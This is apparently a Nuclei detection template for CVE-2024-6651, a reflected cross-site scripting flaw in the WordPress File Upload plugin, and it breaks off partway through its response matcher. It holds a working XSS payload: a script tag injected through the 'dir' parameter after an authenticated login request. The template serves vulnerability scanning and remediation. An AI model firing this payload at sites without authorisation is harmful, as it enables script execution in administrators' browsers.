id: CVE-2024-6651

info:
  name: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'dir' parameter in the file browser page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Attackers can execute arbitrary JavaScript in administrator browsers by crafting malicious URLs with XSS payloads in the dir parameter.
  remediation: |
    Update WordPress File Upload plugin to version 4.24.8 or later to address the reflected XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6651
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-6651
    cwe-id: CWE-79
    epss-score: 0.15434
    epss-percentile: 0.96371
  metadata:
    max-request: 3
    vendor: WordPress
    product: wp-file-upload
    fofa-query: body='wp-content/plugins/wp-file-upload/'
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'wp-file-upload/'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '">